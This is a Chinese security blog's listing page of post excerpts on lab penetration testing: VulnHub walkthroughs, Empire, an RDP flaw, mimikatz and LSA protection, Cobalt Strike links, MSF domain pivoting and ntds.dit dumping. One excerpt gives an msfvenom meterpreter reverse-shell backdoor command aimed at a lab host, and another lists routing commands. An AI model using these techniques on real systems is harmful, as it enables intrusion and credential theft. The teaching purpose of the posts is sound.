上一页 1 ··· 11 12 13 14 15 16 17 18 19 ··· 22 下一页
摘要: 0x01 简介 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。 Moonraker: 1镜像下载地址: http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58 阅读全文
posted @ 2019-09-25 21:32 micr067 阅读(444) 评论(0) 推荐(0) 编辑
摘要: 0x01 简介 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 阅读全文
posted @ 2019-09-24 01:40 micr067 阅读(848) 评论(4) 推荐(2) 编辑
摘要: 0x01 简介 2019年8月13日谷歌披露了影响所有Windows版本的20年未修补漏洞。 来自Google的Project Zero团队的Tavis Ormandy 发现,由于此交互没有访问控制或任何类型的身份验证,因此任何应用程序,任何用户甚至沙盒流程都可以实现以下操作: 在所有会话中连接到c 阅读全文
posted @ 2019-09-17 18:32 micr067 阅读(201) 评论(0) 推荐(0) 编辑
摘要: 0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz 阅读全文
posted @ 2019-09-12 22:17 micr067 阅读(1483) 评论(0) 推荐(2) 编辑
摘要: 0X01 简介 Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 W 阅读全文
posted @ 2019-09-09 15:37 micr067 阅读(2397) 评论(0) 推荐(0) 编辑
摘要: 简介: 微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。 微软官方文档:https://docs.microsoft.com/en-us/prev 阅读全文
posted @ 2019-08-31 23:20 micr067 阅读(701) 评论(0) 推荐(0) 编辑
摘要: 实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO 阅读全文
posted @ 2019-08-31 23:18 micr067 阅读(321) 评论(0) 推荐(0) 编辑
摘要: Cobalt_Strike3.14下载: https://download.csdn.net/download/weixin_41082546/11604021 https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/blu 阅读全文
posted @ 2019-08-30 11:25 micr067 阅读(4783) 评论(0) 推荐(0) 编辑
摘要: MSF 下域内渗透实战 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255. 阅读全文
posted @ 2019-08-30 08:17 micr067 阅读(108) 评论(0) 推荐(0) 编辑
摘要: Kerberos认证工作原理 https://www.cnblogs.com/huamingao/p/7267423.html 5.获取访问活动目录数据库文件的权限(ntds.dit) 前提条件是获取域控权限: 1.通过备份路径(备份服务器储存,媒体,网络共享) 2 在准备配置成域控的服务器上找 N 阅读全文
posted @ 2019-08-30 08:14 micr067 阅读(363) 评论(0) 推荐(0) 编辑
上一页 1 ··· 11 12 13 14 15 16 17 18 19 ··· 22 下一页